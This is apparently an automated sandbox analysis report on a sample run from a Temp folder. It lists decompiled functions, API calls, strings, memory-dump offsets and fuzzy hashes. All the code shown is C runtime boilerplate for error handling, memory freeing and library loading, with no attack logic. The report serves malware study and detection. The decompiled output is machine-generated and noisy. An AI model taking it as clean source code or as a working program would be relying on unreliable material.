Uniqueness Score: -1.00%

Function 0040BEEA, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040BEEA(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x4228f0 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E0040D0ED(_t13, __eflags,  *0x4228f0);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E0040D128(_t14, __eflags,  *0x4228f0, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E0040E961();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E0040D128(_t18, __eflags,  *0x4228f0, 0);
								} else {
									_t8 = E0040D128(_t18, __eflags,  *0x4228f0, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E0040D6D2(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x0040beea
0x0040bef1
0x0040bf04
0x0040bf0b
0x0040bf0d
0x0040bf0e
0x0040bf11
0x0040bf2a
0x0040bf2a
0x0040bf13
0x0040bf13
0x0040bf15
0x0040bf1f
0x0040bf26
0x0040bf28
0x0040bf2f
0x0040bf38
0x0040bf3b
0x0040bf3c
0x0040bf3e
0x0040bf52
0x0040bf52
0x0040bf5b
0x0040bf40
0x0040bf47
0x0040bf4d
0x0040bf4e
0x0040bf50
0x0040bf64
0x0040bf66
0x0040bf66
0x00000000
0x00000000
0x00000000
0x0040bf50
0x0040bf69
0x00000000
0x00000000
0x00000000
0x0040bf28
0x0040bf15
0x0040bf71
0x0040bf7b
0x0040bef3
0x0040bef5
0x0040bef5

APIs

GetLastError.KERNEL32(?,00000000,0040BEE1,0040C7AF,?,00000007,00000000,?,0040AF4A,?,00000000,00000007,?,?,00000000,00000000), ref: 0040BEF8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040BF06
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040BF1F
SetLastError.KERNEL32(00000000,0040AF4A,?,00000000,00000007,?,?,00000000,00000000,00000000,?,00000007,00000000), ref: 0040BF71

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7b3fc2121a9db8eff10d5c957cc6cb3da1aeaf0714f05bfa3b2d63ef36215c79
Instruction ID: 35122fb8f529277f880ccdf4da1df2cc9e4a491ad1671d61c9f57b31f2d3bd7b
Opcode Fuzzy Hash: 7b3fc2121a9db8eff10d5c957cc6cb3da1aeaf0714f05bfa3b2d63ef36215c79
Instruction Fuzzy Hash: 54019232609313AEE62437B67C859672B98EB15778760033FF510A61E0EFBA4C16A5CC

Uniqueness

Uniqueness Score: -1.00%

Function 03F5C13A, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,03F5C131,03F5C9FF,?,00000007,00000000,?,03F5B19A,?,00000000,00000007,?,?,00000000,00000000), ref: 03F5C148
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 03F5C156
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 03F5C16F
SetLastError.KERNEL32(00000000,03F5B19A,?,00000000,00000007,?,?,00000000,00000000,00000000,?,00000007,00000000), ref: 03F5C1C1

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7b3fc2121a9db8eff10d5c957cc6cb3da1aeaf0714f05bfa3b2d63ef36215c79
Instruction ID: 00b7117f0bfeb3ea1c523d0eeeeaadc36d70e49e2db1b14498979ec09316092f
Opcode Fuzzy Hash: 7b3fc2121a9db8eff10d5c957cc6cb3da1aeaf0714f05bfa3b2d63ef36215c79
Instruction Fuzzy Hash: 0A01F73760A7136EE624B775BC8456A3BDCEB116747A0033AFF21491F0EF918801A588

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAD9, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FAD9(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E0041056D(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E0041056D(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E0040F201(GetLastError());
									_t17 =  *((intOrPtr*)(E0040F237(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E0040FBA0(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E0040F201(GetLastError());
						_t17 =  *((intOrPtr*)(E0040F237(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E0040FBA0(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E0040FBC7(_a8);
				return 0;
			}

0x0040fadf
0x0040fae4
0x0040faf8
0x0040fafb
0x0040fb2d
0x0040fb35
0x0040fb37
0x0040fb50
0x0040fb53
0x0040fb56
0x0040fb64
0x0040fb73
0x0040fb7b
0x0040fb7d
0x0040fb96
0x0040fb99
0x0040fb99
0x0040fb7f
0x0040fb86
0x0040fb91
0x0040fb91
0x0040fb9b
0x0040fb9c
0x00000000
0x0040fb9c
0x0040fb5b
0x0040fb60
0x0040fb62
0x00000000
0x00000000
0x00000000
0x0040fb62
0x0040fb40
0x0040fb4b
0x00000000
0x0040fb4b
0x0040fafd
0x0040fb00
0x0040fb03
0x0040fb16
0x0040fb19
0x0040fb1b
0x0040fb1d
0x00000000
0x0040fb1d
0x0040fb09
0x0040fb0e
0x0040fb10
0x00000000
0x00000000
0x00000000
0x0040fb10
0x0040fae9
0x00000000

Strings

C:\Users\user\AppData\Local\Temp\New Feature\4.exe, xrefs: 0040FADE

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\New Feature\4.exe
API String ID: 0-917010740
Opcode ID: 56e757ca9d0622c8cbd2e9cff5d7de3e586e999732b0d16f37c280f579baff3f
Instruction ID: f85f5b8999f606361c1a59cd76bb90ac932e61a837fd27ff3daaf8d95c3df5de
Opcode Fuzzy Hash: 56e757ca9d0622c8cbd2e9cff5d7de3e586e999732b0d16f37c280f579baff3f
Instruction Fuzzy Hash: FD21A171604205AEDB30AE62CC90D6B77BDAB003A8710453AF528A6AC1E739FC458A69

Uniqueness

Uniqueness Score: -1.00%

Function 03F5FD29, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\New Feature\4.exe, xrefs: 03F5FD2E

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\New Feature\4.exe
API String ID: 0-917010740
Opcode ID: 56e757ca9d0622c8cbd2e9cff5d7de3e586e999732b0d16f37c280f579baff3f
Instruction ID: 43cac1d8f1857b3cb9f0ac1316383a375a84c28d5f24f75bfddd325db5f754f2
Opcode Fuzzy Hash: 56e757ca9d0622c8cbd2e9cff5d7de3e586e999732b0d16f37c280f579baff3f
Instruction Fuzzy Hash: 2C215E76A0430AEFDB20EF61CC80D6B77ACAE052A87144594FF25DB150EB20EC0187A0

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDE0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040EDE0(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x422920; // 0x8
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E004115A3(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E0040F24A(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E004115A3(__eflags,  *0x422920, _t51);
							if(__eflags != 0) {
								E0040EC0E(_t51, "P.B");
								E0040F096(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E004115A3(__eflags,  *0x422920, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E004115A3(0,  *0x422920, 0);
							_push(0);
							L9:
							E0040F096();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00411564(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x422920; // 0x8
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E0040E8C3(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x422920; // 0x8
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E004115A3(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E0040F24A(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E004115A3(__eflags,  *0x422920, _t60);
								if(__eflags != 0) {
									E0040EC0E(_t60, "P.B");
									E0040F096(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E004115A3(__eflags,  *0x422920, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E004115A3(__eflags,  *0x422920, _t20);
								_push(_t60);
								L25:
								E0040F096();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00411564(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x422920; // 0x8
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E0040E8C3(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x422920; // 0x8
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E004115A3(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E0040F24A(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E004115A3(__eflags,  *0x422920, _t54);
											if(__eflags != 0) {
												E0040EC0E(_t54, "P.B");
												E0040F096(0);
												goto L45;
											} else {
												_t40 = 0;
												E004115A3(__eflags,  *0x422920, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E004115A3(0,  *0x422920, 0);
											_push(0);
											L41:
											E0040F096();
											goto L36;
										}
									}
								} else {
									_t54 = E00411564(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x422920; // 0x8
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x0040ede0
0x0040ede0
0x0040edeb
0x0040eded
0x0040edf2
0x0040edf5
0x0040ee13
0x0040ee16
0x0040ee1b
0x0040ee1d
0x00000000
0x0040ee1f
0x0040ee2b
0x0040ee2e
0x0040ee2f
0x0040ee31
0x0040ee56
0x0040ee58
0x0040ee71
0x0040ee78
0x0040ee7d
0x00000000
0x0040ee5a
0x0040ee5a
0x0040ee63
0x0040ee68
0x00000000
0x0040ee68
0x0040ee33
0x0040ee33
0x0040ee33
0x0040ee3c
0x0040ee41
0x0040ee42
0x0040ee42
0x0040ee47
0x00000000
0x0040ee47
0x0040ee31
0x0040edf7
0x0040edfd
0x0040ee01
0x0040ee0e
0x00000000
0x0040ee03
0x0040ee06
0x0040ee80
0x0040ee80
0x0040ee08
0x0040ee08
0x0040ee08
0x0040ee0a
0x0040ee0a
0x0040ee0a
0x0040ee06
0x0040ee01
0x0040ee83
0x0040ee8b
0x0040ee8d
0x0040ee8f
0x0040ee97
0x0040ee9c
0x0040ee9d
0x0040eea2
0x0040eea3
0x0040eea6
0x0040eec0
0x0040eec3
0x0040eec8
0x0040eeca
0x00000000
0x0040eecc
0x0040eed8
0x0040eedb
0x0040eedc
0x0040eede
0x0040ef01
0x0040ef03
0x0040ef1a
0x0040ef21
0x0040ef26
0x00000000
0x0040ef05
0x0040ef0c
0x0040ef11
0x00000000
0x0040ef11
0x0040eee0
0x0040eee7
0x0040eeec
0x0040eeed
0x0040eeed
0x0040eef2
0x00000000
0x0040eef2
0x0040eede
0x0040eea8
0x0040eeae
0x0040eeb0
0x0040eeb2
0x0040eebb
0x00000000
0x0040eeb4
0x0040eeb4
0x0040eeb7
0x0040ef31
0x0040ef31
0x0040ef36
0x0040ef39
0x0040ef3a
0x0040ef3b
0x0040ef42
0x0040ef44
0x0040ef49
0x0040ef4c
0x0040ef6a
0x0040ef6d
0x0040ef72
0x0040ef74
0x00000000
0x0040ef76
0x0040ef82
0x0040ef86
0x0040ef88
0x0040efad
0x0040efaf
0x0040efc8
0x0040efcf
0x00000000
0x0040efb1
0x0040efb1
0x0040efba
0x0040efbf
0x00000000
0x0040efbf
0x0040ef8a
0x0040ef8a
0x0040ef8a
0x0040ef93
0x0040ef98
0x0040ef99
0x0040ef99
0x00000000
0x0040ef9e
0x0040ef88
0x0040ef4e
0x0040ef54
0x0040ef56
0x0040ef58
0x0040ef65
0x00000000
0x0040ef5a
0x0040ef5a
0x0040ef5d
0x0040efd7
0x0040efd7
0x0040ef5f
0x0040ef5f
0x0040ef5f
0x0040ef5f
0x0040ef61
0x0040ef61
0x0040ef61
0x0040ef5d
0x0040ef58
0x0040efda
0x0040efe2
0x0040efe4
0x0040efe4
0x0040efeb
0x0040eeb9
0x0040ef29
0x0040ef29
0x0040ef2b
0x00000000
0x0040ef2d
0x0040ef30
0x0040ef30
0x0040ef2b
0x0040eeb7
0x0040eeb2
0x0040ee91
0x0040ee96
0x0040ee96

APIs

GetLastError.KERNEL32(00000008,00000007,00000000,00411B2B), ref: 0040EDE5
_free.LIBCMT ref: 0040EE42
_free.LIBCMT ref: 0040EE78
SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 0040EE83

Strings

P.B, xrefs: 0040EE6B

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast_free
String ID: P.B
API String ID: 2283115069-2678322
Opcode ID: 9472460b015560aff6bbe8c93742a5fb80cdbb8d9516325d21b67270fd361ce7
Instruction ID: aa01defeb2006d3a2958eaedfd630d1109244237861c87f9c6bac48c86bdd445
Opcode Fuzzy Hash: 9472460b015560aff6bbe8c93742a5fb80cdbb8d9516325d21b67270fd361ce7
Instruction Fuzzy Hash: 78115C733052043ADA212777EC85D67265A97C437CB240A3FF215A22F2DDBD8C66819C

Uniqueness

Uniqueness Score: -1.00%

Function 03F5F030, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000008,00000007,00000000,03F61D7B), ref: 03F5F035
_free.LIBCMT ref: 03F5F092
_free.LIBCMT ref: 03F5F0C8
SetLastError.KERNEL32(00000000,00422920,000000FF), ref: 03F5F0D3

Strings

P.B, xrefs: 03F5F0BB

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID: P.B
API String ID: 2283115069-2678322
Opcode ID: 9472460b015560aff6bbe8c93742a5fb80cdbb8d9516325d21b67270fd361ce7
Instruction ID: 4cd2ffe873dc881b33b52c53b44a265a622056fea3d47a576666523486caf619
Opcode Fuzzy Hash: 9472460b015560aff6bbe8c93742a5fb80cdbb8d9516325d21b67270fd361ce7
Instruction Fuzzy Hash: 0911C67B704302BAC631F774AD84D2B3669ABC5375B2D02B4FB258B1F0DEA188068115

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF37, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040EF37(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x422920; // 0x8
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E004115A3(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E0040F24A(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E004115A3(__eflags,  *0x422920, _t18);
							if(__eflags != 0) {
								E0040EC0E(_t18, "P.B");
								E0040F096(0);
								goto L13;
							} else {
								_t13 = 0;
								E004115A3(__eflags,  *0x422920, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E004115A3(0,  *0x422920, 0);
							_push(0);
							L9:
							E0040F096();
							goto L4;
						}
					}
				} else {
					_t18 = E00411564(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x422920; // 0x8
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x0040ef42
0x0040ef44
0x0040ef49
0x0040ef4c
0x0040ef6a
0x0040ef6d
0x0040ef72
0x0040ef74
0x00000000
0x0040ef76
0x0040ef82
0x0040ef86
0x0040ef88
0x0040efad
0x0040efaf
0x0040efc8
0x0040efcf
0x00000000
0x0040efb1
0x0040efb1
0x0040efba
0x0040efbf
0x00000000
0x0040efbf
0x0040ef8a
0x0040ef8a
0x0040ef8a
0x0040ef93
0x0040ef98
0x0040ef99
0x0040ef99
0x00000000
0x0040ef9e
0x0040ef88
0x0040ef4e
0x0040ef54
0x0040ef58
0x0040ef65
0x00000000
0x0040ef5a
0x0040ef5d
0x0040efd7
0x0040efd7
0x0040ef5f
0x0040ef5f
0x0040ef5f
0x0040ef61
0x0040ef61
0x0040ef61
0x0040ef5d
0x0040ef58
0x0040efda
0x0040efe2
0x0040efeb

APIs

GetLastError.KERNEL32(?,00402CE2,?,0040F23C,0040F1B3,?,,@4,00409B2A,,@4,?,00402CE2,00000034,?,?,?), ref: 0040EF3C
_free.LIBCMT ref: 0040EF99
_free.LIBCMT ref: 0040EFCF
SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040F23C,0040F1B3,?,,@4,00409B2A,,@4,?,00402CE2,00000034,?,?,?), ref: 0040EFDA

Strings

P.B, xrefs: 0040EFC2

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast_free
String ID: P.B
API String ID: 2283115069-2678322
Opcode ID: 654bcb487d8e8b3ced70bb41c8d130fcba8e6fc61f8135ea798387cc9359daaa
Instruction ID: 0aa2e0e92e2ae520a1b30507eac8ac58a2266897db9767e9aef1f560c7622a86
Opcode Fuzzy Hash: 654bcb487d8e8b3ced70bb41c8d130fcba8e6fc61f8135ea798387cc9359daaa
Instruction Fuzzy Hash: AA1129723092017ADA212777AC81D67366A97C8379B24063BF215A62F2DEBDCC55411C

Uniqueness

Uniqueness Score: -1.00%

Function 03F5F187, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,03F52F32,?,03F5F48C,03F5F403,?,?,03F59D7A,03F52F32,?,03F52F32,00000034,?,?,?), ref: 03F5F18C
_free.LIBCMT ref: 03F5F1E9
_free.LIBCMT ref: 03F5F21F
SetLastError.KERNEL32(00000000,00422920,000000FF,?,03F5F48C,03F5F403,?,?,03F59D7A,03F52F32,?,03F52F32,00000034,?,?,?), ref: 03F5F22A

Strings

P.B, xrefs: 03F5F212

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID: P.B
API String ID: 2283115069-2678322
Opcode ID: 654bcb487d8e8b3ced70bb41c8d130fcba8e6fc61f8135ea798387cc9359daaa
Instruction ID: 48f037f108efdf406ca4a38dc36dc5383a32ef83ae95b9d79097a9c6f20ff723
Opcode Fuzzy Hash: 654bcb487d8e8b3ced70bb41c8d130fcba8e6fc61f8135ea798387cc9359daaa
Instruction Fuzzy Hash: BC11C87B704301FED621F774EC84D2B3A6AABC9675B6902B4FF259B1E0DE6188028125

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF82, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CF82(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x4235fc + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x41a610 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L11:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L13:
							if(_t32 != 0) {
								_t16 = _t32;
								L17:
								return _t16;
							}
							L14:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							_t32 = 0;
							L9:
							if(_t32 != 0) {
								goto L11;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L14;
						}
						_t18 = E0040EA68(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L9;
					}
					if(_t32 == 0xffffffff) {
						goto L14;
					}
					goto L13;
				}
				_t16 = 0;
				goto L17;
			}

0x0040cf89
0x0040d01a
0x0040cf91
0x0040cf93
0x0040cf9a
0x0040cf9c
0x0040cfa1
0x0040cfaa
0x0040cfbf
0x0040cfc3
0x0040d001
0x0040d001
0x0040d006
0x0040d00a
0x0040d00d
0x0040d00d
0x0040d013
0x0040d015
0x0040d02a
0x0040d025
0x0040d029
0x0040d029
0x0040d017
0x0040d017
0x00000000
0x0040d017
0x0040cfc5
0x0040cfce
0x0040cff1
0x0040cff1
0x0040cff3
0x0040cff5
0x00000000
0x00000000
0x0040cffd
0x00000000
0x0040cffd
0x0040cfd8
0x0040cfdd
0x0040cfe2
0x00000000
0x00000000
0x0040cfe7
0x0040cfed
0x00000000
0x0040cfed
0x0040cfa6
0x00000000
0x00000000
0x00000000
0x0040cfa8
0x0040d023
0x00000000

Strings

api-ms-, xrefs: 0040CFD2

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: e71028f28aaf39e1470936d711a86c04a8ecfd30948e0dcc296aba3a8958cb83
Instruction ID: 5847508531109dad3671cb7d18fbfbb2983684305f1cca9f96ea8328795ad855
Opcode Fuzzy Hash: e71028f28aaf39e1470936d711a86c04a8ecfd30948e0dcc296aba3a8958cb83
Instruction Fuzzy Hash: A711D631E05222EBCB314F64CC84A5B77689F457A8F114232E80AB73D0D738DD0696D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E124, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040E124(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x4171ec(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x0040e12a
0x0040e12e
0x0040e139
0x0040e141
0x0040e14c
0x0040e152
0x0040e156
0x0040e15d
0x0040e163
0x0040e163
0x0040e165
0x0040e16a
0x00000000
0x0040e16f
0x0040e176

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040E119,00000000,?,0040E0E1,00000007,?,00000000), ref: 0040E139
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E14C
FreeLibrary.KERNEL32(00000000,?,?,0040E119,00000000,?,0040E0E1,00000007,?,00000000), ref: 0040E16F

Strings

mscoree.dll, xrefs: 0040E132
CorExitProcess, xrefs: 0040E144

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 7b6ac019052fb3435031fb641c7b8d043ff31f9a88378787f99eb1762038334a
Instruction ID: 095a9c7ab88b9e22f88f5014ebdfa60099cff724309e91eafbbea14bcaccd764
Opcode Fuzzy Hash: 7b6ac019052fb3435031fb641c7b8d043ff31f9a88378787f99eb1762038334a
Instruction Fuzzy Hash: 67F08C30A41218FBDB129F61DC0DBDE7A79EB00B56F104071E801B12E0CB788F50EA98

Uniqueness

Uniqueness Score: -1.00%

Function 00410C89, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410C89(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;

				_t21 = _a4;
				if(_t21 != 0) {
					_t7 =  *_t21;
					if( *_t21 !=  *0x422f18) {
						E0040F096(_t7);
					}
					_t8 =  *((intOrPtr*)(_t21 + 4));
					if( *((intOrPtr*)(_t21 + 4)) !=  *0x422f1c) {
						E0040F096(_t8);
					}
					_t9 =  *((intOrPtr*)(_t21 + 8));
					if( *((intOrPtr*)(_t21 + 8)) !=  *0x422f20) {
						E0040F096(_t9);
					}
					_t10 =  *((intOrPtr*)(_t21 + 0x30));
					if( *((intOrPtr*)(_t21 + 0x30)) !=  *0x422f48) {
						E0040F096(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					if(_t6 !=  *0x422f4c) {
						return E0040F096(_t6);
					}
				}
				return _t6;
			}

0x00410c8f
0x00410c94
0x00410c96
0x00410c9e
0x00410ca1
0x00410ca6
0x00410ca7
0x00410cb0
0x00410cb3
0x00410cb8
0x00410cb9
0x00410cc2
0x00410cc5
0x00410cca
0x00410ccb
0x00410cd4
0x00410cd7
0x00410cdc
0x00410cdd
0x00410ce6
0x00000000
0x00410cee
